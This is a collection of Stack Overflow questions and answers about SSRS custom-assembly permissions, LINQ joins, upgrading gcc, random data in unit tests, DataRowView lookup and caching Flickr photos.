Q: How do I resolve a System.Security.SecurityException with custom code in SSRS? I've created an assembly and referenced it in my Reporting Services report. I've tested the report locally (works), and I then uploaded the report to a report server (doesn't work). Here is the error that is thrown by the custom code I've written. System.Security.SecurityException: Request for the permission of type 'System.Security.Permissions.SecurityPermission, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' failed. at System.Security.CodeAccessSecurityEngine.CheckNReturnSO(PermissionToken permToken, CodeAccessPermission demand, StackCrawlMark& stackMark, Int32 unrestrictedOverride, Int32 create) at System.Security.CodeAccessSecurityEngine.Assert(CodeAccessPermission cap, StackCrawlMark& stackMark) at System.Security.CodeAccessPermission.Assert() at [Snipped Method Name] at ReportExprHostImpl.CustomCodeProxy.[Snipped Method Name] The action that failed was: Demand The type of the first permission that failed was: System.Security.Permissions.SecurityPermission The Zone of the assembly that failed was: MyComputer This project is something I inherited, and I'm not intimately familiar with it. Although I do have the code (now), so I can at least work with it :) I believe the code that is failing is this: Dim fio As System.Security.Permissions.FileIOPermission = New System.Security.Permissions.FileIOPermission(Security.Permissions.PermissionState.Unrestricted) fio.Assert() However, this kind of stuff is everywhere too: Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hhash As Integer, ByVal pbData As String, ByVal dwDataLen As Integer, ByVal dwFlags As Integer) As Integer I can see either of these being things that Reporting Services would not accommodate out of the box. A: This is how I was able to solve the issue: * *strongly sign the custom assembly in question *modify the rssrvpolicy.config file to add permissions for the assembly <CodeGroup class="UnionCodeGroup" version="1" PermissionSetName="FullTrust" Name="Test" Description="This code group grants the Test code full trust. "> <IMembershipCondition class="StrongNameMembershipCondition" version="1" PublicKeyBlob="0024000004800000940100000602000000240000575341310004000001000100ab4b135615ca6dfd586aa0c5807b3e07fa7a02b3f376c131e0442607de792a346e64710e82c833b42c672680732f16193ba90b2819a77fa22ac6d41559724b9c253358614c270c651fad5afe9a0f8cbd1e5e79f35e0f04cb3e3b020162ac86f633cf0d205263280e3400d1a5b5781bf6bd12f97917dcdde3c8d03ee61ccba2c0" /> </CodeGroup> Side note: here is a great way to get the public key blob of your assembly VS trick for obtaining the public key token and blob of a signed assembly. A: <system.web> <trust level="Full"/> </system.web> try this in web.config A: Run your service in administrator mode A: <CodeGroup class="FirstMatchCodeGroup" version="1" PermissionSetName="FullTrust"> For me, the solution was changing the above line in the rssrvpolicy.config from "None" to "FullTrust".
{ "language": "en", "url": "https://stackoverflow.com/questions/32428", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "13" }
Q: Creating a LINQ select from multiple tables This query works great: var pageObject = (from op in db.ObjectPermissions join pg in db.Pages on op.ObjectPermissionName equals page.PageName where pg.PageID == page.PageID select op) .SingleOrDefault(); I get a new type with my 'op' fields. Now I want to retrieve my 'pg' fields as well, but select op, pg).SingleOrDefault(); doesn't work. How can I select everything from both tables so that they appear in my new pageObject type? A: You can use anonymous types for this, i.e.: var pageObject = (from op in db.ObjectPermissions join pg in db.Pages on op.ObjectPermissionName equals page.PageName where pg.PageID == page.PageID select new { pg, op }).SingleOrDefault(); This will make pageObject into an IEnumerable of an anonymous type so AFAIK you won't be able to pass it around to other methods, however if you're simply obtaining data to play with in the method you're currently in it's perfectly fine. You can also name properties in your anonymous type, i.e.:- var pageObject = (from op in db.ObjectPermissions join pg in db.Pages on op.ObjectPermissionName equals page.PageName where pg.PageID == page.PageID select new { PermissionName = pg, ObjectPermission = op }).SingleOrDefault(); This will enable you to say:- if (pageObject.PermissionName.FooBar == "golden goose") Application.Exit(); For example :-) A: If you don't want to use anonymous types b/c let's say you're passing the object to another method, you can use the LoadWith load option to load associated data. It requires that your tables are associated either through foreign keys or in your Linq-to-SQL dbml model. db.DeferredLoadingEnabled = false; DataLoadOptions dlo = new DataLoadOptions(); dlo.LoadWith<ObjectPermissions>(op => op.Pages) db.LoadOptions = dlo; var pageObject = from op in db.ObjectPermissions select op; // no join needed Then you can call pageObject.Pages.PageID Depending on what your data looks like, you'd probably want to do this the other way around, DataLoadOptions dlo = new DataLoadOptions(); dlo.LoadWith<Pages>(p => p.ObjectPermissions) db.LoadOptions = dlo; var pageObject = from p in db.Pages select p; // no join needed var objectPermissionName = pageObject.ObjectPermissions.ObjectPermissionName; A: You must create a new anonymous type: select new { op, pg } Refer to the official guide. A: If the anonymous type causes trouble for you, you can create a simple data class: public class PermissionsAndPages { public ObjectPermissions Permissions {get;set} public Pages Pages {get;set} } and then in your query: select new PermissionsAndPages { Permissions = op, Page = pg }; Then you can pass this around: return queryResult.SingleOrDefault(); // as PermissionsAndPages A: change select op) to select new { op, pg })
{ "language": "en", "url": "https://stackoverflow.com/questions/32433", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "54" }
Q: Which 4.x version of gcc should one use? The product-group I work for is currently using gcc 3.4.6 (we know it is ancient) for a large low-level c-code base, and want to upgrade to a later version. We have seen performance benefits testing different versions of gcc 4.x on all hardware platforms we tested it on. We are however very scared of c-compiler bugs (for a good reason historically), and wonder if anyone has insight to which version we should upgrade to. Are people using 4.3.2 for large code-bases and feel that it works fine? A: When I migrated a project from GCC 3 to GCC 4 I ran several tests to ensure that behavior was the same before and after. Can you just run a run a set of (hopefully automated) tests to confirm the correct behavior? After all, you want the "correct" behavior, not necessarily the GCC 3 behavior. A: The best quality control for gcc is the linux kernel. GCC is the compiler of choice for basically all major open source C/C++ programs. A released GCC, especially one like 4.3.X, which is in major linux distros, should be pretty good. GCC 4.3 also has better support for optimizations on newer cpus. A: I don't have a specific version for you, but why not have a 4.X and 3.4.6 installed? Then you could try and keep the code compiling on both versions, and if you run across a show-stopping bug in 4, you have an exit policy. A: Use the latest one, but hunt down and understand each and every warning -Wall gives. For extra fun, there are more warning flags to frob. You do have an extensive suite of regression (and other) tests, run them all and check them. GCC (particularly C++, but also C) has changed quite a bit. It does much better code analysis and optimization, and does handle code that turns out to invoke undefined bahaviiour differently. So code that "worked fine" but really did rely on some particular interpretation of invalid constructions will probably break. Hopefully making the compiler emit a warning or error, but no guarantee of such luck. A: If you are interested in OpenMP then you will need to move to gcc 4.2 or greater. We are using 4.2.2 on a code base of around 5M lines and are not having any problems with it. A: I can't say anything about 4.3.2, but my laptop is a Gentoo Linux system built with GCC 4.3.{0,1} (depending on when each package was built), and I haven't seen any problems. This is mostly just standard desktop use, though. If you have any weird code, your mileage may vary.
{ "language": "en", "url": "https://stackoverflow.com/questions/32448", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: Random data in Unit Tests? I have a coworker who writes unit tests for objects which fill their fields with random data. His reason is that it gives a wider range of testing, since it will test a lot of different values, whereas a normal test only uses a single static value. I've given him a number of different reasons against this, the main ones being: * *random values means the test isn't truly repeatable (which also means that if the test can randomly fail, it can do so on the build server and break the build) *if it's a random value and the test fails, we need to a) fix the object and b) force ourselves to test for that value every time, so we know it works, but since it's random we don't know what the value was Another coworker added: * *If I am testing an exception, random values will not ensure that the test ends up in the expected state *random data is used for flushing out a system and load testing, not for unit tests Can anyone else add additional reasons I can give him to get him to stop doing this? (Or alternately, is this an acceptable method of writing unit tests, and I and my other coworker are wrong?) A: There's a compromise. Your coworker is actually onto something, but I think he's doing it wrong. I'm not sure that totally random testing is very useful, but it's certainly not invalid. A program (or unit) specification is a hypothesis that there exists some program that meets it. The program itself is then evidence of that hypothesis. What unit testing ought to be is an attempt to provide counter-evidence to refute that the program works according to the spec. Now, you can write the unit tests by hand, but it really is a mechanical task. It can be automated. All you have to do is write the spec, and a machine can generate lots and lots of unit tests that try to break your code. I don't know what language you're using, but see here: Java http://functionaljava.org/ Scala (or Java) http://github.com/rickynils/scalacheck Haskell http://www.cs.chalmers.se/~rjmh/QuickCheck/ .NET: http://blogs.msdn.com/dsyme/archive/2008/08/09/fscheck-0-2.aspx These tools will take your well-formed spec as input and automatically generate as many unit tests as you want, with automatically generated data. They use "shrinking" strategies (which you can tweak) to find the simplest possible test case to break your code and to make sure it covers the edge cases well. Happy testing! A: * *if it's a random value and the test fails, we need to a) fix the object and b) force ourselves to test for that value every time, so we know it works, but since it's random we don't know what the value was If your test case does not accurately record what it is testing, perhaps you need to recode the test case. I always want to have logs that I can refer back to for test cases so that I know exactly what caused it to fail whether using static or random data. A: This kind of testing is called a Monkey test. When done right, it can smoke out bugs from the really dark corners. To address your concerns about reproducibility: the right way to approach this, is to record the failed test entries, generate a unit test, which probes for the entire family of the specific bug; and include in the unit test the one specific input (from the random data) which caused the initial failure. A: You should ask yourselves what is the goal of your test. Unit tests are about verifying logic, code flow and object interactions. Using random values tries to achieve a different goal, thus reduces test focus and simplicity. It is acceptable for readability reasons (generating UUID, ids, keys,etc.). Specifically for unit tests, I cannot recall even once this method was successful finding problems. But I have seen many determinism problems (in the tests) trying to be clever with random values and mainly with random dates. Fuzz testing is a valid approach for integration tests and end-to-end tests. A: Can you generate some random data once (I mean exactly once, not once per test run), then use it in all tests thereafter? I can definitely see the value in creating random data to test those cases that you haven't thought of, but you're right, having unit tests that can randomly pass or fail is a bad thing. A: There is a half-way house here which has some use, which is to seed your PRNG with a constant. That allows you to generate 'random' data which is repeatable. Personally I do think there are places where (constant) random data is useful in testing - after you think you've done all your carefully-thought-out corners, using stimuli from a PRNG can sometimes find other things. A: If you're using random input for your tests you need to log the inputs so you can see what the values are. This way if there is some edge case you come across, you can write the test to reproduce it. I've heard the same reasons from people for not using random input, but once you have insight into the actual values used for a particular test run then it isn't as much of an issue. The notion of "arbitrary" data is also very useful as a way of signifying something that is not important. We have some acceptance tests that come to mind where there is a lot of noise data that is no relevance to the test at hand. A: I think the problem here is that the purpose of unit tests is not catching bugs. The purpose is being able to change the code without breaking it, so how are you going to know that you break your code when your random unit tests are green in your pipeline, just because they doesn't touch the right path? Doing this is insane for me. A different situation could be running them as integration tests or e2e not as a part of the build, and just for some specific things because in some situations you will need a mirror of your code in your asserts to test that way. And having a test suite as complex as your real code is like not having tests at all because who is going to test your suite then? :p A: I am in favor of random tests, and I write them. However, whether they are appropriate in a particular build environment and which test suites they should be included in is a more nuanced question. Run locally (e.g., overnight on your dev box) randomized tests have found bugs both obvious and obscure. The obscure ones are arcane enough that I think random testing was really the only realistic one to flush them out. As a test, I took one tough-to-find bug discovered via randomized testing and had a half dozen crack developers review the function (about a dozen lines of code) where it occurred. None were able to detect it. Many of your arguments against randomized data are flavors of "the test isn't reproducible". However, a well written randomized test will capture the seed used to start the randomized seed and output it on failure. In addition to allowing you to repeat the test by hand, this allows you to trivially create new test which test the specific issue by hardcoding the seed for that test. Of course, it's probably nicer to hand-code an explicit test covering that case, but laziness has its virtues, and this even allows you to essentially auto-generate new test cases from a failing seed. The one point you make that I can't debate, however, is that it breaks the build systems. Most build and continuous integration tests expect the tests to do the same thing, every time. So a test that randomly fails will create chaos, randomly failing and pointing the fingers at changes that were harmless. A solution then, is to still run your randomized tests as part of the build and CI tests, but run it with a fixed seed, for a fixed number of iterations. Hence the test always does the same thing, but still explores a bunch of the input space (if you run it for multiple iterations). Locally, e.g., when changing the concerned class, you are free to run it for more iterations or with other seeds. If randomized testing ever becomes more popular, you could even imagine a specific suite of tests which are known to be random, which could be run with different seeds (hence with increasing coverage over time), and where failures wouldn't mean the same thing as deterministic CI systems (i.e., runs aren't associated 1:1 with code changes and so you don't point a finger at a particular change when things fail). There is a lot to be said for randomized tests, especially well written ones, so don't be too quick to dismiss them! A: If you are doing TDD then I would argue that random data is an excellent approach. If your test is written with constants, then you can only guarantee your code works for the specific value. If your test is randomly failing the build server there is likely a problem with how the test was written. Random data will help ensure any future refactoring will not rely on a magic constant. After all, if your tests are your documentation, then doesn't the presence of constants imply it only needs to work for those constants? I am exaggerating however I prefer to inject random data into my test as a sign that "the value of this variable should not affect the outcome of this test". I will say though that if you use a random variable then fork your test based on that variable, then that is a smell. A: A unit test is there to ensure the correct behaviour in response to particular inputs, in particular all code paths/logic should be covered. There is no need to use random data to achieve this. If you don't have 100% code coverage with your unit tests, then fuzz testing by the back door is not going to achieve this, and it may even mean you occasionally don't achieve your desired code coverage. It may (pardon the pun) give you a 'fuzzy' feeling that you're getting to more code paths, but there may not be much science behind this. People often check code coverage when they run their unit tests for the first time and then forget about it (unless enforced by CI), so do you really want to be checking coverage against every run as a result of using random input data? It's just another thing to potentially neglect. Also, programmers tend to take the easy path, and they make mistakes. They make just as many mistakes in unit tests as they do in the code under test. It's way too easy for someone to introduce random data, and then tailor the asserts to the output order in a single run. Admit it, we've all done this. When the data changes the order can change and the asserts fail, so a portion of the executions fail. This portion needn't be 1/2 I've seen exactly this result in failures 10% of the time. It takes a long time to track down problems like this, and if your CI doesn't record enough data about enough of the runs, then it can be even worse. Whilst there's an argument for saying "just don't make these mistakes", in a typical commercial programming setup there'll be a mix of abilities, sometimes relatively junior people reviewing code for other junior people. You can write literally dozens more tests in the time it takes to debug one non-deterministic test and fix it, so make sure you don't have any. Don't use random data. A: In my experience unit tests and randomized tests should be separated. Unit tests serve to give a certainty of the correctness of some cases, not only to catch obscure bugs. All that said, randomized testing is useful and should be done, separately from unit tests, but it should test a series of randomized values. I can't help to think that testing 1 random value with every run is just not enough, neither to be a sufficient randomized test, neither to be a truly useful unit test. Another aspect is validating the test results. If you have random inputs, you have to calculate the expected output for it inside the test. This will at some level duplicate the tested logic, making the test only a mirror of the tested code itself. This will not sufficiently test the code, since the test might contain the same errors the original code does. A: This is an old question, but I wanted to mention a library I created that generates objects filled with random data. It supports reproducing the same data if a test fails by supplying a seed. It also supports JUnit 5 via an extension. Example usage: Person person = Instancio.create(Person.class); Or a builder API for customising generation parameters: Person person = Instancio.of(Person.class) .generate(field("age"), gen -> gen.ints.min(18).max(65)) .create(); Github link has more examples: https://github.com/instancio/instancio You can find the library on maven central: <dependency> <groupId>org.instancio</groupId> <artifactId>instancio-junit</artifactId> <version>LATEST</version> </dependency> A: In the book Beautiful Code, there is a chapter called "Beautiful Tests", where he goes through a testing strategy for the Binary Search algorithm. One paragraph is called "Random Acts of Testing", in which he creates random arrays to thoroughly test the algorithm. You can read some of this online at Google Books, page 95, but it's a great book worth having. So basically this just shows that generating random data for testing is a viable option. A: Your co-worker is doing fuzz-testing, although he doesn't know about it. They are especially valuable in server systems. A: One advantage for someone looking at the tests is that arbitrary data is clearly not important. I've seen too many tests that involved dozens of pieces of data and it can be difficult to tell what needs to be that way and what just happens to be that way. E.g. If an address validation method is tested with a specific zip code and all other data is random then you can be pretty sure the zip code is the only important part. A: Depending on your object/app, random data would have a place in load testing. I think more important would be to use data that explicitly tests the boundary conditions of the data. A: We just ran into this today. I wanted pseudo-random (so it would look like compressed audio data in terms of size). I TODO'd that I also wanted deterministic. rand() was different on OSX than on Linux. And unless I re-seeded, it could change at any time. So we changed it to be deterministic but still psuedo-random: the test is repeatable, as much as using canned data (but more conveniently written). This was NOT testing by some random brute force through code paths. That's the difference: still deterministic, still repeatable, still using data that looks like real input to run a set of interesting checks on edge cases in complex logic. Still unit tests. Does that still qualify is random? Let's talk over beer. :-) A: I can envisage three solutions to the test data problem: * *Test with fixed data *Test with random data *Generate random data once, then use it as your fixed data I would recommend doing all of the above. That is, write repeatable unit tests with both some edge cases worked out using your brain, and some randomised data which you generate only once. Then write a set of randomised tests that you run as well. The randomised tests should never be expected to catch something your repeatable tests miss. You should aim to cover everything with repeatable tests, and consider the randomised tests a bonus. If they find something, it should be something that you couldn't have reasonably predicted; a real oddball. A: How can your guy run the test again when it has failed to see if he has fixed it? I.e. he loses repeatability of tests. While I think there is probably some value in flinging a load of random data at tests, as mentioned in other replies it falls more under the heading of load testing than anything else. It is pretty much a "testing-by-hope" practice. I think that, in reality, your guy is simply not thinkng about what he is trying to test, and making up for that lack of thought by hoping randomness will eventually trap some mysterious error. So the argument I would use with him is that he is being lazy. Or, to put it another way, if he doesn't take the time to understand what he is trying to test it probably shows he doesn't really understand the code he is writing.
{ "language": "en", "url": "https://stackoverflow.com/questions/32458", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "180" }
Q: Get the DefaultView DataRowView from a DataRow Here's the situation: I need to bind a WPF FixedPage against a DataRow. Bindings don't work against DataRows; they work against DataRowViews. I need to do this in the most generic way possible, as I know nothing about and have no control over what is in the DataRow. What I need is to be able to get a DataRowView for a given DataRow. I can't use the Find() method on the DefaultView because that takes a key, and there is no guarantee the table will have a primary key set. Does anybody have a suggestion as to the best way to go around this? A: Not Exactly a sexy piece of code but their doesn't seem to be an automated way to find the row without just looping the table. DataRowView newRowView = null; foreach (DataRowView tempRowView in myDataTable.DefaultView) { if (tempRowView.Row == rowToMatch) newRowView = tempRowView; } if (newRow != null) UseNewRowView(newRowView); else HandleRowNotFound(); A: row.Table.DefaultView[row.Table.Rows.IndexOf(row)] This is an okay answer. But if you find yourself in this situation, you should consider learning more about DataViews and how they are used, then refactor your code to be view-centric rather than table-centric.
{ "language": "en", "url": "https://stackoverflow.com/questions/32460", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Pulling limited tagged photos from Flickr So I've got a hobby site I'm working on. I've got items that are tagged and I want to associate those items with photos from Flickr. Even with restrictive searches, I might get results numbering in the thousands. Requirements: * *I want to display between 10-20 pictures but I want to randomize the photos each time. *I don't want to hit Flickr every time a page request is made. *Not every Flickr photo with the same tags as my item will be relevant. How should I store that number of results and how would I determine which ones are relevant? A: I would suggest moving the code that selects, randomizes, downloads and caches photos to separate service. It could be locally accessible REST application. Keep your core code clean and don't clutter it with remote operations and retention policy. * *Build tags-to-images map and store it locally, in file or database. Randomizing array is easy in both cases. *Point image src to local cache. Clean cache periodically, depending on your hosting capacity. *Whitelist or blacklist photos to filter them in step 1. A: Your best bet for parts 1 and 2 is to make a large request, say returning 100 or 200 photos and store the URL and other details. Then producing random selections from your local copy should be simple. For part 3 I'm not sure how you would accomplish this without some form of human intervention, unless you can define 'relevant' in some terms you can program against. If human intervention is fine then obviously they can browse your local copy of photos and pick relevant ones (or discard un-relevant ones).
{ "language": "en", "url": "https://stackoverflow.com/questions/32462", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }